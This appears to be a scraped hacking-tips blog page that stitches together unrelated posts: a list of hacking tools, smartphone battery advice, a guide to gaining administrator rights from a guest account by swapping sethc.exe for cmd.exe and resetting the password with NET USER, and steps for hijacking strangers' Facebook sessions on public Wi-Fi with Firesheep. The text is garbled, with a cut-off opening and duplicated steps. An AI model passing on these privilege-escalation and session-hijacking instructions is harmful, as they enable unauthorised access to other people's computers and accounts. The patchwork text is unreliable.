6. After the computer starts to read the text file if you want to exit the program open task manager by pressing Crtl+Shift+Esc and end the process "wscript.exe" under the Processes tab.
10 Hacking Software and Tools
Contains a following software:
- Cain and Abel (sniffer)
- John the Ripper (powerful brootforce)
- NetStumbler (allows to define radius of action of network WiFi –in real time for the diagram it is possible to see size of a useful signal)
- Nmap (one of the best network scanner)
- Putty (a quite good telnet the client)
- SuperScan (powerful scanner TCP of ports, pinger and hostname resolver)
- Hping (allows to generate specialICMP/UDP/TCP packages and to look through answers ping a hostin style of the usual utility ping)
- Lcp (audit and restoration of passwords Windows NT / 2000 / XP / 2003)
- Nikto (perl the scanner broken Web a server, with support SSL)
- Kismet (sniffer a wireless network 802.11 and the decoder of packages)
How To Save Your Smart Phone From Battery Killing Applications...
In these days everyoneof us using SMART Phone. We are using Smart phones becausethey are providing lotsof applications. Android is one of the latest operating system in mobile withlots of free and paid applications.
But during the use of these applications the battery of every smart phone gets down verysoon. So in this post ofmobile trick I am going to gives you some tricks with the help of these mobile tricks you can increaseyour battery life.
5 Tips to Protect YourSmartphone’s Battery
1.Go Easy on Ad-Supported Apps
Most of the applications constantly connect andreload, which is a major hit to your battery life. Not all free apps have ads; and not all paid apps are ad free. But you can count on any ad-supported app to be a major drain on your battery, especially if it’s using location-tracking to personalize the content.
2.Beware of Apps that Use Too Many Internal Features
Ads are a particular example, but any app that uses a lot of the ‘internals’ of your phone will suck the juice right out of it. As we’ve said, GPS and other location servicesare a major concern, but it also goes for vibration alerts, WiFi, Bluetooth, and sensors(accelerometer, compass, etc.)
3.Don’t Allow Push Alerts
Email is great, Facebook is great, knowing the minute that there’s an update to your apps is great. Et cetera. After all, staying connected on a second-by-second basis is the reason younever let your smartphone out of your sight. Having saidthat, your battery might be drained twice as fast if you leave email push, social media, and/or app update notifications turned on.
4.Be Vigilant about Apps Mess with Your Display
Apps and app settings that adjust the brightness and timeout of the screen could be costing you juice. Obviously one ofthose bright flashlight apps is going to run your battery down, but also keep an eye on things like graphics-intensive games, e-readers, lock screen gadgets.
5.Monitor your Usage
I’ve been telling you all about apps that youshould watch out for, but I’ll change course and recommend two essential types of appsthat you should have installed: one to monitor your battery: ideally, with enough detail to let you know exactly what kinds of usage is most draining. And one to kill battery-sucking apps that keep running in the background. There area few apps that do both quite well; Android users should take a look at Android Assistant(which, ironically, comes in an ad-sponsored trial version).
Beware of these factors and save your battery life for long period.
How to Hack admin pc using Guest
u can use the one which is
easier for u...
METHOD 1..
1) Go to Cwindows/
­system32.
2) Copy cmd.exe and paste it on
desktop.
3) Rename cmd.exe to
sethc.exe.
4) Copy the new sethc.exe
tosystem 32,when windows
asks for overwriting the
file,then click yes.
5) Now Log out from your guest
account and at the user select
window,press shift key 5 times.
6) Instead of Sticky Key
confirmation dialog,command
prompt with full administrator
privileges will open.
7) Now type “ NET USER
ADMINISTRATOR zzz where zzz
can be any password you like
and press enter.
You will see “ The Command
completed successfully and
then exit the command prompt
and login into administrator
with your new password.
9) Bravo !! Now You have
hacked admin through guest
account.
METHOD 2..
1. Right-click on the “My
Computer” icon on the desktop
OR in the Start Menu.
2. Select the option “Manage”.
3. On the left pane expand the
“Computer Management (Local)
tree (if it is not already
expanded)
4. Double click “Local Users and
Groups” option From “System
Tools” tree.
5. Click the “Users” option.
6. Now you will see the list
ofusers on the right side
pane,such as Administrator,
Guest etc.
7. Right click the
“Administrator” and select the
option “Set Password” option.
8. Now you will see a
warningmessage, Click on
proceed.
9. Now the system asks you for
“New Password” and “Confirm
Password” .
10. After entering the password
click on “OK”. The password is
changed. That’s It!..
that's it..!!! you have
successfully changed the
Administrator password
without knowing It
Hacking any Facebook Account using Wifi
You need this requirement:
*.Public Wi-Fi Access
*. winpcap
*. FireSheep
Step 1: Download the Firesheep file. Right click on the file and select "Open With" and select Mozila Firefox.
Step 2: Once you have installed firesheepin the Firefox web browser, click View at the top, then go to the sidebar and click on Fireheep.
Step 3 Now click on the top left "Start Capture" and start to capture the session cookies of people in yourWiFi network, which will show the list of cookies that are captured and have visited unsecured website known to firesheep, double-click the image and you will be logged in instantly.
Step 1: Download the Firesheep file. Right click on the file and select "Open With" and select Mozila Firefox.
Step 2: Once you have installed firesheepin the Firefox web browser, click View at the top, then go to the sidebar and click on Fireheep.
Step 3 Now click on the top left "Start Capture" and start to capture the session cookies of people in yourWiFi network, which will show the list of cookies that are captured and have visited unsecured website known to firesheep, double-click the image and you will be logged in instantly.
Subscribe to:
Comments (Atom)